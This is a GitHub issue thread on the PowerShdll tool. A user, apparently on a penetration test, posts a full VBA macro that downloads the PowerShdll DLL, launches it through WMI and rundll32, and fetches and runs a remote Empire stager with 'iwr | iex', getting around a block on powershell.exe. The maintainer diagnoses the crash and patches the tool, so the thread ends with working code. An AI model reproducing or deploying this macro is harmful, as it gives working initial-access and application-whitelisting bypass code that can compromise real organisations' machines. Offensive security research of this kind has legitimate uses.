Execute PowerShdll from VBA macro
vivami opened this issue · 4 comments
First of all: thanks for this awesome project!
I'm trying to execute PowerShdll via a VBA macro (client blocks powershell.exe, and I want an Empire agent), by first downloading the dll (DownloadDLL()
) and then executing the downloaded PowerShdll.dll by letting it downloading a script to execute (Empire stager). This works when I execute StrCmd
in a cmd.exe, but does not work when executing it via the following VBA script:
Public Function Debugging() As Variant
DownloadDLL
Dim StrCmd As String
StrCmd = "C:\Windows\System32\rundll32.exe C:\Temp\PowerShdll.dll,main . { iwr -useb https://cl.ly/kgIa/stager.ps1 } ^| iex;"
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
objProcess.Create StrCmd, Null, objConfig, intProcessID
End Function
Sub DownloadDLL()
Dim myURL As String
myURL = "https://github.com/p3nt4/PowerShdll/raw/master/dll/bin/x64/Release/PowerShdll.dll"
Dim WinHttpReq As Object
Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP.6.0")
WinHttpReq.Open "GET", myURL, False
WinHttpReq.send
myURL = WinHttpReq.responseBody
If WinHttpReq.Status = 200 Then
Set oStream = CreateObject("ADODB.Stream")
oStream.Open
oStream.Type = 1
oStream.Write WinHttpReq.responseBody
oStream.SaveToFile "C:\Temp\PowerShdll.dll", 2
oStream.Close
End If
End Sub
This results in the following error message:
Problem signature:
Problem Event Name: CLR20r3
Problem Signature 01: rundll32.exe
Problem Signature 02: 6.3.9600.17415
Problem Signature 03: 54504eb8
Problem Signature 04: mscorlib
Problem Signature 05: 4.0.30319.36366
Problem Signature 06: 57a0f7f9
Problem Signature 07: 4528
Problem Signature 08: 9a
Problem Signature 09: System.IO.IOException
OS Version: 6.3.9600.2.0.0.272.7
Locale ID: 1033
Additional Information 1: 6ebd
Additional Information 2: 6ebd833e076778d4646eaf22a3f76243
Additional Information 3: e34d
Additional Information 4: e34d4e50642e55705797b1cdfa61a4c5
Any clue as to how I can fix this? Thanks in advance!
I think I understand the problem. I used a trick to show the command output inside the current shell.
Basically, it steals the calling process' console and writes to it. In this context there is no shell so it will not work.
I will add an option to not show output.
I added the -n switch to not redirect output. Should be ok now.
Please confirm.
Thanks! It works now, also without the -n switch.
I moved the console hijacking bit after the script execution, so I assume it would crash after the command has been executed.